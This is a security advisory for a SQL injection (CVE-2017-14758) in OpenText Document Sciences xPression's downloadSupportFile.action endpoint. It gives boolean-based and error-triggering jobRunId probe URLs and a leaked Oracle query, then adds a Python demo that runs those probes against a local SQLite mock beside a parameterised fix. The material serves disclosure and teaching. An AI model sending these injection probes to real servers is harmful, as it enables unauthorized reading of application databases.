OpenText Document Sciences xPression 4.5SP1 Patch 13 SQL Injection

Source: packetstormsecurity.com (PACKETSTORM:144395)
Author: Mariusz Woloszyn
Published: 2017-09-29 00:00:00

EPSS: 0.002 (percentile 55.6%)

`Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - SQL Injection  
Author: Marcin Woloszyn  
Date: 27 September 2017  
CVE: CVE-2017-14758  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
SQL Injection:  
==============  
  
The jobRunId parameter is concatenated into the query instead of being  
bound through a prepared statement, so the application is prone to SQL  
injection. An attacker can retrieve data from the application database  
by exploiting the issue.  
  
Vector:  
-------  
  
Boolean-based (the two requests produce different responses):  
  
True:  http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1  
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2  
  
Additionally, appending a non-numeric suffix to the parameter:  
  
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa  
  
results in the following error in the response:  
  
HTTP/1.1 200 OK  
[...]  
<b>Errors: </b>  
  
See nested exception; nested exception is:  
java.lang.RuntimeException:  
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method  
getJobRunsByIds did not succeed because of a database operation  
failure.;  
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:  
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,  
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,  
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID  
FROM T_JOBRUN WHERE  
JOBRUN_ID=1502642747222443244706554841153aaa.;  
	---> nested java.sql.SQLSyntaxErrorException:  
ORA-00933: SQL command not properly ended  
  
The error message discloses the whole query and the injection point (an  
unquoted numeric JOBRUN_ID predicate, so no quote is needed in the  
payload). The verbose ORA- error reflected in an HTTP 200 response can  
also be used for error-based data extraction.  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`
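As an added example (not code from the advisory or from OpenText), the three probes from the Vector section are run against a local SQLite stand-in for the vulnerable query, next to a parameterised handler that the same probes can no longer distinguish from a clean request. The column list and the unquoted numeric predicate are taken from the query leaked in the error message; the table contents, the shorter job run ID and the simulated ORA-00933 text are assumptions (the real backend is Oracle).

```python
"""Boolean-based and error-based probes for the downloadSupportFile.action
jobRunId injection, run against a local stand-in for the vulnerable query.

Added example, not code from the advisory or from OpenText. The query shape
and column list come from the error message the advisory reproduces; the
SQLite database, the job row and the job run ID are constructed sample data
(the real backend is Oracle, so the ORA-00933 text is simulated here).
"""
import re
import sqlite3

# Column list exactly as leaked in the advisory's error message.
COLUMNS = ("JOBRUN_ID, JOB_NAME, PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, "
           "END_TIME, HAS_DISTRIBUTION, DISTRIBUTION_NUMBER, STATUS, ERROR, "
           "REPORTING_LEVEL, THREAD_ID, JOB_ID")
ORA_ERROR = re.compile(r"ORA-\d{5}")


def make_db() -> sqlite3.Connection:
    """Constructed sample T_JOBRUN table with a single job run (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE T_JOBRUN (JOBRUN_ID INTEGER PRIMARY KEY, JOB_NAME TEXT, "
        "PUBLISH_PROFILE TEXT, PUBLISH_TYPE TEXT, START_TIME TEXT, END_TIME TEXT, "
        "HAS_DISTRIBUTION INTEGER, DISTRIBUTION_NUMBER INTEGER, STATUS TEXT, "
        "ERROR TEXT, REPORTING_LEVEL INTEGER, THREAD_ID INTEGER, JOB_ID INTEGER)")
    db.execute(
        "INSERT INTO T_JOBRUN VALUES (1502642747222, 'nightly-statements', 'prod', "
        "'batch', '2017-08-13 16:45', '2017-08-13 16:47', 1, 3, 'COMPLETED', NULL, "
        "2, 7, 42)")
    return db


def vulnerable_handler(db: sqlite3.Connection, job_run_id: str) -> str:
    """Mimics the observed behaviour: the raw parameter is concatenated into
    the SQL, and a database error is echoed into an HTTP 200 response body."""
    sql = f"SELECT {COLUMNS} FROM T_JOBRUN WHERE JOBRUN_ID={job_run_id}"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Oracle reports "ORA-00933: SQL command not properly ended" here;
        # the ORA- prefix is simulated because SQLite words it differently.
        return ("HTTP/1.1 200 OK\n<b>Errors: </b>\nDatabase syntax error :"
                f"{sql}.\nORA-00933: {exc}")
    if not rows:
        return "HTTP/1.1 200 OK\nNo support file found for this job run."
    return f"HTTP/1.1 200 OK\nSupport file for job {rows[0][1]} (run {rows[0][0]})"


def fixed_handler(db: sqlite3.Connection, job_run_id: str) -> str:
    """Hardened version (assumption): validate the ID as an integer and bind it
    as a parameter, so the value never reaches the SQL parser as code.
    COLUMNS is a constant, not user input, so formatting it in is safe."""
    if not job_run_id.isdigit():
        return "HTTP/1.1 400 Bad Request\nInvalid jobRunId"
    rows = db.execute(
        f"SELECT {COLUMNS} FROM T_JOBRUN WHERE JOBRUN_ID=?", (int(job_run_id),)
    ).fetchall()
    if not rows:
        return "HTTP/1.1 200 OK\nNo support file found for this job run."
    return f"HTTP/1.1 200 OK\nSupport file for job {rows[0][1]} (run {rows[0][0]})"


def probes(job_run_id: str) -> dict:
    """The advisory's three requests as URL-decoded parameter values. The ID
    sits unquoted in a numeric predicate, so the payload needs no quote."""
    return {
        "true": f"{job_run_id} and 1=1",   # ?jobRunId=<id>+and+1=1
        "false": f"{job_run_id} and 1=2",  # ?jobRunId=<id>+and+1=2
        "error": f"{job_run_id}aaa",       # ?jobRunId=<id>aaa
    }


def assess(handler, db: sqlite3.Connection, job_run_id: str) -> dict:
    """Send the probes and classify what the responses reveal."""
    baseline = handler(db, job_run_id)
    bodies = {name: handler(db, value) for name, value in probes(job_run_id).items()}
    return {
        # Boolean-based: the true condition behaves like the baseline request,
        # the false condition does not.
        "boolean_based": bodies["true"] == baseline and bodies["false"] != baseline,
        # Error-based: a raw database error is reflected in the response.
        "error_based": ORA_ERROR.search(bodies["error"]) is not None,
        # Query disclosure: the statement itself appears in the response.
        "query_disclosed": "FROM T_JOBRUN WHERE JOBRUN_ID=" in bodies["error"],
    }


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler), ("fixed", fixed_handler)):
        print(name, assess(handler, make_db(), "1502642747222"))
```

Against the real endpoint the same three requests are sent over HTTP and the bodies compared the same way; the comparison is deliberately on the whole body, because on this application the difference between a true and a false condition is whether a support file is returned at all. The hardened handler rejects anything that is not a plain integer before binding it, which is what closes both the boolean-based and the error-based channel at once.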
